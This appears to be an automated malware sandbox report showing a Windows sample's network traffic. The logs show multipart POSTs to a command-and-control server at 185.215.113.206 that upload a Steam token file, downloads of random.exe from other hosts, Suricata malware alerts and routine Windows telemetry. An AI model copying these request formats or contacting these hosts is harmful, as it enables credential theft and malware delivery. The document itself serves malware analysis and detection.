Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DAAECAFHDBGIDGCAEHJEHost: 185.215.113.206Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 41 41 45 43 41 46 48 44 42 47 49 44 47 43 41 45 48 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 36 62 33 61 65 38 36 34 66 37 30 36 33 38 33 30 35 61 38 38 37 65 30 39 65 35 63 31 61 39 64 30 30 39 31 62 62 63 66 30 31 30 37 62 31 31 33 38 33 64 63 64 61 64 63 39 63 66 36 63 38 30 34 62 65 36 38 66 33 30 66 0d 0a 2d 2d 2d 2d 2d 2d 44 41 41 45 43 41 46 48 44 42 47 49 44 47 43 41 45 48 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 44 41 41 45 43 41 46 48 44 42 47 49 44 47 43 41 45 48 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 44 41 41 45 43 41 46 48 44 42 47 49 44 47 43 41 45 48 4a 45 2d 2d 0d 0a Data Ascii: ------DAAECAFHDBGIDGCAEHJEContent-Disposition: form-data; name="token"56b3ae864f70638305a887e09e5c1a9d0091bbcf0107b11383dcdadc9cf6c804be68f30f------DAAECAFHDBGIDGCAEHJEContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------DAAECAFHDBGIDGCAEHJEContent-Disposition: form-data; name="file"------DAAECAFHDBGIDGCAEHJE--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GIJECGDGCBKECAKFBGCAHost: 185.215.113.206Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 49 4a 45 43 47 44 47 43 42 4b 45 43 41 4b 46 42 47 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 36 62 33 61 65 38 36 34 66 37 30 36 33 38 33 30 35 61 38 38 37 65 30 39 65 35 63 31 61 39 64 30 30 39 31 62 62 63 66 30 31 30 37 62 31 31 33 38 33 64 63 64 61 64 63 39 63 66 36 63 38 30 34 62 65 36 38 66 33 30 66 0d 0a 2d 2d 2d 2d 2d 2d 47 49 4a 45 43 47 44 47 43 42 4b 45 43 41 4b 46 42 47 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 47 49 4a 45 43 47 44 47 43 42 4b 45 43 41 4b 46 42 47 43 41 2d 2d 0d 0a Data Ascii: ------GIJECGDGCBKECAKFBGCAContent-Disposition: form-data; name="token"56b3ae864f70638305a887e09e5c1a9d0091bbcf0107b11383dcdadc9cf6c804be68f30f------GIJECGDGCBKECAKFBGCAContent-Disposition: form-data; name="message"ybncbhylepme------GIJECGDGCBKECAKFBGCA--
Source: global traffic	HTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 185.215.113.16Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DHCBAEHJJJKKFIDGHJECHost: 185.215.113.206Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 48 43 42 41 45 48 4a 4a 4a 4b 4b 46 49 44 47 48 4a 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 36 62 33 61 65 38 36 34 66 37 30 36 33 38 33 30 35 61 38 38 37 65 30 39 65 35 63 31 61 39 64 30 30 39 31 62 62 63 66 30 31 30 37 62 31 31 33 38 33 64 63 64 61 64 63 39 63 66 36 63 38 30 34 62 65 36 38 66 33 30 66 0d 0a 2d 2d 2d 2d 2d 2d 44 48 43 42 41 45 48 4a 4a 4a 4b 4b 46 49 44 47 48 4a 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 44 48 43 42 41 45 48 4a 4a 4a 4b 4b 46 49 44 47 48 4a 45 43 2d 2d 0d 0a Data Ascii: ------DHCBAEHJJJKKFIDGHJECContent-Disposition: form-data; name="token"56b3ae864f70638305a887e09e5c1a9d0091bbcf0107b11383dcdadc9cf6c804be68f30f------DHCBAEHJJJKKFIDGHJECContent-Disposition: form-data; name="message"wkkjqaiaxkhb------DHCBAEHJJJKKFIDGHJEC--
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 41 32 43 37 39 42 35 35 44 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7EBA2C79B55D82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic	HTTP traffic detected: GET /files/random.exe HTTP/1.1Host: 31.41.244.11

Source: Joe Sandbox View	IP Address: 185.215.113.43 185.215.113.43
Source: Joe Sandbox View	IP Address: 13.107.246.63 13.107.246.63
Source: Joe Sandbox View	IP Address: 13.107.246.40 13.107.246.40
Source: Joe Sandbox View	IP Address: 13.107.246.40 13.107.246.40

Source: Joe Sandbox View

ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL

Source: Joe Sandbox View	JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
Source: Joe Sandbox View	JA3 fingerprint: 6271f898ce5be7dd52b0fc260d0662b3
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: Network traffic	Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.6:49717 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.6:49817 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.6:49944 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:56493 -> 31.41.244.11:80

Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.147.12
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.147.12
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.147.12
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.147.12
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.147.12
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.147.12
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.147.12
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.147.12
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.147.12
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.147.12
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.147.12
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.147.12
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.147.12
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.147.12
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.147.12
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.147.12
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.147.12
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.147.12
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.147.12
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.147.12
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.147.12
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.147.12
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.147.12
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.147.12
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.147.12
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.147.12
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.147.12
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.147.12
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.147.12
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.147.12
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.147.12
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.147.12
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.147.12
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.147.12
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.147.12
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.147.12
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.147.12
Source: unknown	TCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknown	TCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknown	TCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknown	TCP traffic detected without corresponding DNS query: 20.223.36.55
Source: unknown	TCP traffic detected without corresponding DNS query: 20.223.36.55
Source: unknown	TCP traffic detected without corresponding DNS query: 20.223.36.55
Source: unknown	TCP traffic detected without corresponding DNS query: 20.223.36.55
Source: unknown	TCP traffic detected without corresponding DNS query: 20.223.36.55
Source: unknown	TCP traffic detected without corresponding DNS query: 20.223.36.55
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.147.12
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.147.12
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.147.12
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.147.12

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6CA6CC60 PR_Recv,

0_2_6CA6CC60

Source: global traffic	HTTP traffic detected: GET /v3/Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=338389&adm=2&w=1&h=1&wpx=1&hpx=1&fmt=json&cltp=app&dim=le&rafb=0&nct=1&pm=1&cfmt=text,image,poly&sft=jpeg,png,gif&topt=1&poptin=0&localid=w:068D482D-8F3B-78AE-DAA0-0C08B8FF2AE6&ctry=CH&time=20231005T064722Z&lc=en-CH&pl=en-CH,en-GB&idtp=mid&uid=d215e385-cdc6-4502-a974-fb4c5f95db96&aid=00000000-0000-0000-0000-000000000000&ua=WindowsShellClient%2F9.0.40929.0%20%28Windows%29&asid=984cc50f254047018b405213e27a1630&ctmode=MultiSession&arch=x64&betaedgever=0.0.0.0&canedgever=0.0.0.0&cdm=1&cdmver=10.0.19041.1023&devedgever=0.0.0.0&devfam=Windows.Desktop&devform=Unknown&devosver=10.0.19045.2006&disphorzres=1280&dispsize=17.1&dispvertres=1024&isu=0&lo=597590&metered=false&nettype=ethernet&npid=sc-338389&oemName=VMware%2C%20Inc.&oemid=Public&ossku=Professional&scmid=Public&smBiosDm=VMware20%2C1&stabedgever=117.0.2045.55&svcmpt=Red&svgtng=2&svtmexp=1699747200&svtmupd=1696486876&tl=2&tsu=597590&waasBldFlt=1&waasCfgExp=1&waasCfgSet=1&waasRetail=1&waasRing=&svoffered=0 HTTP/1.1Accept-Encoding: gzip, deflateX-SDK-CACHE: chs=0&imp=0&chf=0&ds=50543&fs=23594&sc=6Cache-Control: no-cacheMS-CV: 2ootsPAFokK7xISX.0User-Agent: WindowsShellClient/9.0.40929.0 (Windows)X-SDK-HWF: arm0,arm640,ble0,cmb0,cmf0,cmr0,dcb1,dcc1,dx91,dxa1,dxb1,gyr0,hce0,hdc0,hov0,hsa0,hss1,kbd1,m041,m060,m080,m120,m160,m200,m301,m751,mA01,mct0,mgn0,mic0,mrc0,mse1,mT01,nfc0,rs10,rs20,rs30,rs40,rs50,rs60,tch0,tel0,v010,v020,v040,x641,x860,x86a640,xbd0,xbo0,xbs0,xbx0,xgp0Host: arc.msn.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /v3/Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=310091&adm=2&w=1&h=1&wpx=1&hpx=1&fmt=json&cltp=app&dim=le&rafb=0&nct=1&pm=1&cfmt=text,image,poly&sft=jpeg,png,gif&topt=1&poptin=0&localid=w:068D482D-8F3B-78AE-DAA0-0C08B8FF2AE6&ctry=CH&time=20231005T064722Z&lc=en-CH&pl=en-CH,en-GB&idtp=mid&uid=d215e385-cdc6-4502-a974-fb4c5f95db96&aid=00000000-0000-0000-0000-000000000000&ua=WindowsShellClient%2F9.0.40929.0%20%28Windows%29&asid=874154d8f3a748c29b97a8d26c03d7c9&ctmode=MultiSession&arch=x64&betaedgever=0.0.0.0&canedgever=0.0.0.0&cdm=1&cdmver=10.0.19041.1023&devedgever=0.0.0.0&devfam=Windows.Desktop&devform=Unknown&devosver=10.0.19045.2006&disphorzres=1280&dispsize=17.1&dispvertres=1024&isu=0&lo=597590&metered=false&nettype=ethernet&npid=sc-310091&oemName=VMware%2C%20Inc.&oemid=Public&ossku=Professional&rver=2&scmid=Public&smBiosDm=VMware20%2C1&stabedgever=117.0.2045.55&svcmpt=Red&svgtng=2&svtmexp=1699747200&svtmupd=1696486876&tl=2&tsu=597590&waasBldFlt=1&waasCfgExp=1&waasCfgSet=1&waasRetail=1&waasRing=&svoffered=0 HTTP/1.1Accept-Encoding: gzip, deflateX-SDK-CACHE: chs=0&imp=0&chf=0&ds=50543&fs=23594&sc=6Cache-Control: no-cacheMS-CV: 2ootsPAFokK7xISX.0User-Agent: WindowsShellClient/9.0.40929.0 (Windows)X-SDK-HWF: arm0,arm640,ble0,cmb0,cmf0,cmr0,dcb1,dcc1,dx91,dxa1,dxb1,gyr0,hce0,hdc0,hov0,hsa0,hss1,kbd1,m041,m060,m080,m120,m160,m200,m301,m751,mA01,mct0,mgn0,mic0,mrc0,mse1,mT01,nfc0,rs10,rs20,rs30,rs40,rs50,rs60,tch0,tel0,v010,v020,v040,x641,x860,x86a640,xbd0,xbo0,xbs0,xbx0,xgp0Host: arc.msn.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /v3/Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=338388&adm=2&w=1&h=1&wpx=1&hpx=1&fmt=json&cltp=app&dim=le&rafb=0&nct=1&pm=1&cfmt=text,image,poly&sft=jpeg,png,gif&topt=1&poptin=0&localid=w:068D482D-8F3B-78AE-DAA0-0C08B8FF2AE6&ctry=CH&time=20241123T060913Z&lc=en-CH&pl=en-CH,en-GB&idtp=mid&uid=d215e385-cdc6-4502-a974-fb4c5f95db96&aid=00000000-0000-0000-0000-000000000000&ua=WindowsShellClient%2F9.0.40929.0%20%28Windows%29&asid=6660103ebd9a4cd3a75221ac8dea0323&ctmode=MultiSession&arch=x64&betaedgever=0.0.0.0&canedgever=0.0.0.0&cdm=1&cdmver=10.0.19041.1023&devedgever=0.0.0.0&devfam=Windows.Desktop&devform=Unknown&devosver=10.0.19045.2006&disphorzres=1280&dispsize=17.1&dispvertres=1024&isu=0&lo=597591&metered=false&nettype=ethernet&npid=sc-338388&oemName=ehijqc%2C%20Inc.&oemid=Public&ossku=Professional&rver=2&scmid=Public&smBiosDm=ehijqc20%2C1&stabedgever=117.0.2045.55&svcmpt=Red&svgtng=2&svtmexp=1699747200&svtmupd=1696486876&tl=2&tsu=597591&waasBldFlt=1&waasCfgExp=1&waasCfgSet=1&waasRetail=1&waasRing=&svoffered=0 HTTP/1.1Accept-Encoding: gzip, deflateX-SDK-CACHE: chs=0&imp=0&chf=0&ds=50543&fs=23594&sc=6X-SDK-HW-TOKEN: t=EwDoAppeBAAUGoFunEzxzyai/T0i5tnZAAR1eX0AAWYBm1YhnWoZBXbxPqZv4jRbyYFHrXoCKR8yDlRnn5fz9cMrDvM+ENKhD58WblGKZvckPKo/wxPIBbNstb0a2ffybX7HLt0ANyVaSOF7yfazU1km1LRmAJImRCqRFOvbSeCgr9nGr4JJlK1g2kHWSY2n2Ux7l9qmifugenC5Seu7nro4iraU6TkR1XJDMLHsIcbGfec417uFzjU8iMpawtToPCYl8bkXGQiexGQckPwGJVuDOKlyRMvBKs4JFkcP4rplqE09bXs40pZZAjn6ud+JzDRRft/NA3aBoAlpWT2sXivcw68J8XKFlFMoxUE5ONabQJ3eLb0h2TwLTWSz3xAQZgAAEHiia57ZOKKGVfxa1MdokIiwAarKbrEoPrZgMTLds2BehW1ahw13UJQ3xPnFpMpY1DKsJaz1MtgbLHqfy+j/ijItarPsUYZNRT4/m0DWmeDG4ynj7mZq+3o/yGM2qVn7PeJKfHEO+GlXD3681O2bsFegUDSl3W+uv5WDEZ/ziUbtCu2zYtOH3eqlwqP0RzSHLsTIXc6Jzy4IqcIaZGSDMDOwswoDo9+pr38c+2XdGOoJAA8PaKWtN1nQpsMJnqoDvvFudXvijYItjCd+pX8R4mqBmX7OIcl3PhOpGHDixD/dfHeKTXh1sE71Acqb6Tur/f6CvIuSR+isV8ykDFvwZtXvRFBCzSpFdm5q0uXYPvJB8bd6wT6xJ6QtIxKxFWypKPUYXFdnvCLb5v5FxoocP8foAgpqk231am8Y/TM+JYyN6V9LvV215wI0Z+oUjq7xojOZeFqv/P8S7sN82fb+SPTsi5+3HD/jgTvfp37yQEjEuGRiIJ9I1ivcQoWli3A7EpkszyeR6bs7sRxOhScp9AAhlCAFqyIIEZyhMmGu5swmT6TkpojM9pAGdIHH/kvcbTylXAaEbHIqHdro+X3YUfeb0tcB&p=Cache-Control: no-cacheMS-CV: KV23mrU2tE2b7UBv.0User-Agent: WindowsShellClient/9.0.40929.0 (Windows)X-SDK-HWF: arm0,arm640,ble0,cmb0,cmf0,cmr0,dcb1,dcc1,dx91,dxa1,dxb1,gyr0,hce0,hdc0,hov0,hsa0,hss1,kbd1,m041,m060,m080,m120,m160,m200,m301,m751,mA01,mct0,mgn0,mic0,mrc0,mse1,mT01,nfc0,rs10,rs20,rs30,rs40,rs50,rs60,tch0,tel0,v010,v020,v040,x641,x860,x86a640,xbd0,xbo0,xbs0,xbx0,xgp0Host: arc.msn.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /v3/Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=338387&adm=2&w=1&h=1&wpx=1&hpx=1&fmt=json&cltp=app&dim=le&rafb=0&nct=1&pm=1&cfmt=text,image,poly&sft=jpeg,png,gif&topt=1&poptin=0&localid=w:068D482D-8F3B-78AE-DAA0-0C08B8FF2AE6&ctry=CH&time=20241123T060913Z&lc=en-CH&pl=en-CH,en-GB&idtp=mid&uid=d215e385-cdc6-4502-a974-fb4c5f95db96&aid=00000000-0000-0000-0000-000000000000&ua=WindowsShellClient%2F9.0.40929.0%20%28Windows%29&asid=ec914062d74e4a548a02837a1420fdfa&ctmode=MultiSession&arch=x64&betaedgever=0.0.0.0&canedgever=0.0.0.0&cdm=1&cdmver=10.0.19041.1023&devedgever=0.0.0.0&devfam=Windows.Desktop&devform=Unknown&devosver=10.0.19045.2006&disphorzres=1280&dispsize=17.1&dispvertres=1024&isu=0&lo=597591&metered=false&nettype=ethernet&npid=sc-338387&oemName=ehijqc%2C%20Inc.&oemid=Public&ossku=Professional&rver=2&sc-mode=0&scmid=Public&smBiosDm=ehijqc20%2C1&stabedgever=117.0.2045.55&svcmpt=Red&svgtng=2&svtmexp=1699747200&svtmupd=1696486876&tl=2&tsu=597591&waasBldFlt=1&waasCfgExp=1&waasCfgSet=1&waasRetail=1&waasRing=&svoffered=0 HTTP/1.1Accept-Encoding: gzip, deflateX-SDK-CACHE: chs=0&imp=0&chf=0&ds=50543&fs=23594&sc=6X-SDK-HW-TOKEN: t=EwDoAppeBAAUGoFunEzxzyai/T0i5tnZAAR1eX0AAWYBm1YhnWoZBXbxPqZv4jRbyYFHrXoCKR8yDlRnn5fz9cMrDvM+ENKhD58WblGKZvckPKo/wxPIBbNstb0a2ffybX7HLt0ANyVaSOF7yfazU1km1LRmAJImRCqRFOvbSeCgr9nGr4JJlK1g2kHWSY2n2Ux7l9qmifugenC5Seu7nro4iraU6TkR1XJDMLHsIcbGfec417uFzjU8iMpawtToPCYl8bkXGQiexGQckPwGJVuDOKlyRMvBKs4JFkcP4rplqE09bXs40pZZAjn6ud+JzDRRft/NA3aBoAlpWT2sXivcw68J8XKFlFMoxUE5ONabQJ3eLb0h2TwLTWSz3xAQZgAAEHiia57ZOKKGVfxa1MdokIiwAarKbrEoPrZgMTLds2BehW1ahw13UJQ3xPnFpMpY1DKsJaz1MtgbLHqfy+j/ijItarPsUYZNRT4/m0DWmeDG4ynj7mZq+3o/yGM2qVn7PeJKfHEO+GlXD3681O2bsFegUDSl3W+uv5WDEZ/ziUbtCu2zYtOH3eqlwqP0RzSHLsTIXc6Jzy4IqcIaZGSDMDOwswoDo9+pr38c+2XdGOoJAA8PaKWtN1nQpsMJnqoDvvFudXvijYItjCd+pX8R4mqBmX7OIcl3PhOpGHDixD/dfHeKTXh1sE71Acqb6Tur/f6CvIuSR+isV8ykDFvwZtXvRFBCzSpFdm5q0uXYPvJB8bd6wT6xJ6QtIxKxFWypKPUYXFdnvCLb5v5FxoocP8foAgpqk231am8Y/TM+JYyN6V9LvV215wI0Z+oUjq7xojOZeFqv/P8S7sN82fb+SPTsi5+3HD/jgTvfp37yQEjEuGRiIJ9I1ivcQoWli3A7EpkszyeR6bs7sRxOhScp9AAhlCAFqyIIEZyhMmGu5swmT6TkpojM9pAGdIHH/kvcbTylXAaEbHIqHdro+X3YUfeb0tcB&p=Cache-Control: no-cacheMS-CV: KV23mrU2tE2b7UBv.0User-Agent: WindowsShellClient/9.0.40929.0 (Windows)X-SDK-HWF: arm0,arm640,ble0,cmb0,cmf0,cmr0,dcb1,dcc1,dx91,dxa1,dxb1,gyr0,hce0,hdc0,hov0,hsa0,hss1,kbd1,m041,m060,m080,m120,m160,m200,m301,m751,mA01,mct0,mgn0,mic0,mrc0,mse1,mT01,nfc0,rs10,rs20,rs30,rs40,rs50,rs60,tch0,tel0,v010,v020,v040,x641,x860,x86a640,xbd0,xbo0,xbs0,xbx0,xgp0Host: arc.msn.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /v3/Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=280815&adm=2&w=1&h=1&wpx=1&hpx=1&fmt=json&cltp=app&dim=le&rafb=0&nct=1&pm=1&cfmt=text,image,poly&sft=jpeg,png,gif&topt=1&poptin=0&localid=w:068D482D-8F3B-78AE-DAA0-0C08B8FF2AE6&ctry=CH&time=20241123T060913Z&lc=en-CH&pl=en-CH,en-GB&idtp=mid&uid=d215e385-cdc6-4502-a974-fb4c5f95db96&aid=00000000-0000-0000-0000-000000000000&ua=WindowsShellClient%2F9.0.40929.0%20%28Windows%29&asid=ba555dbd944448859b3909591936aa52&ctmode=MultiSession&arch=x64&betaedgever=0.0.0.0&canedgever=0.0.0.0&cdm=1&cdmver=10.0.19041.1023&devedgever=0.0.0.0&devfam=Windows.Desktop&devform=Unknown&devosver=10.0.19045.2006&disphorzres=1280&dispsize=17.1&dispvertres=1024&isu=0&lo=597591&metered=false&nettype=ethernet&npid=sc-280815&oemName=ehijqc%2C%20Inc.&oemid=Public&ossku=Professional&scmid=Public&smBiosDm=ehijqc20%2C1&stabedgever=117.0.2045.55&svcmpt=Red&svgtng=2&svtmexp=1699747200&svtmupd=1696486876&tl=2&tsu=597591&waasBldFlt=1&waasCfgExp=1&waasCfgSet=1&waasRetail=1&waasRing=&svoffered=0 HTTP/1.1Accept-Encoding: gzip, deflateX-SDK-CACHE: chs=0&imp=0&chf=0&ds=50543&fs=23594&sc=6X-SDK-HW-TOKEN: t=EwDoAppeBAAUGoFunEzxzyai/T0i5tnZAAR1eX0AAWYBm1YhnWoZBXbxPqZv4jRbyYFHrXoCKR8yDlRnn5fz9cMrDvM+ENKhD58WblGKZvckPKo/wxPIBbNstb0a2ffybX7HLt0ANyVaSOF7yfazU1km1LRmAJImRCqRFOvbSeCgr9nGr4JJlK1g2kHWSY2n2Ux7l9qmifugenC5Seu7nro4iraU6TkR1XJDMLHsIcbGfec417uFzjU8iMpawtToPCYl8bkXGQiexGQckPwGJVuDOKlyRMvBKs4JFkcP4rplqE09bXs40pZZAjn6ud+JzDRRft/NA3aBoAlpWT2sXivcw68J8XKFlFMoxUE5ONabQJ3eLb0h2TwLTWSz3xAQZgAAEHiia57ZOKKGVfxa1MdokIiwAarKbrEoPrZgMTLds2BehW1ahw13UJQ3xPnFpMpY1DKsJaz1MtgbLHqfy+j/ijItarPsUYZNRT4/m0DWmeDG4ynj7mZq+3o/yGM2qVn7PeJKfHEO+GlXD3681O2bsFegUDSl3W+uv5WDEZ/ziUbtCu2zYtOH3eqlwqP0RzSHLsTIXc6Jzy4IqcIaZGSDMDOwswoDo9+pr38c+2XdGOoJAA8PaKWtN1nQpsMJnqoDvvFudXvijYItjCd+pX8R4mqBmX7OIcl3PhOpGHDixD/dfHeKTXh1sE71Acqb6Tur/f6CvIuSR+isV8ykDFvwZtXvRFBCzSpFdm5q0uXYPvJB8bd6wT6xJ6QtIxKxFWypKPUYXFdnvCLb5v5FxoocP8foAgpqk231am8Y/TM+JYyN6V9LvV215wI0Z+oUjq7xojOZeFqv/P8S7sN82fb+SPTsi5+3HD/jgTvfp37yQEjEuGRiIJ9I1ivcQoWli3A7EpkszyeR6bs7sRxOhScp9AAhlCAFqyIIEZyhMmGu5swmT6TkpojM9pAGdIHH/kvcbTylXAaEbHIqHdro+X3YUfeb0tcB&p=Cache-Control: no-cacheMS-CV: KV23mrU2tE2b7UBv.0User-Agent: WindowsShellClient/9.0.40929.0 (Windows)X-SDK-HWF: arm0,arm640,ble0,cmb0,cmf0,cmr0,dcb1,dcc1,dx91,dxa1,dxb1,gyr0,hce0,hdc0,hov0,hsa0,hss1,kbd1,m041,m060,m080,m120,m160,m200,m301,m751,mA01,mct0,mgn0,mic0,mrc0,mse1,mT01,nfc0,rs10,rs20,rs30,rs40,rs50,rs60,tch0,tel0,v010,v020,v040,x641,x860,x86a640,xbd0,xbo0,xbs0,xbx0,xgp0Host: arc.msn.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /rules/other-Win32-v19.bundle HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule224902v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120608v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120609v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
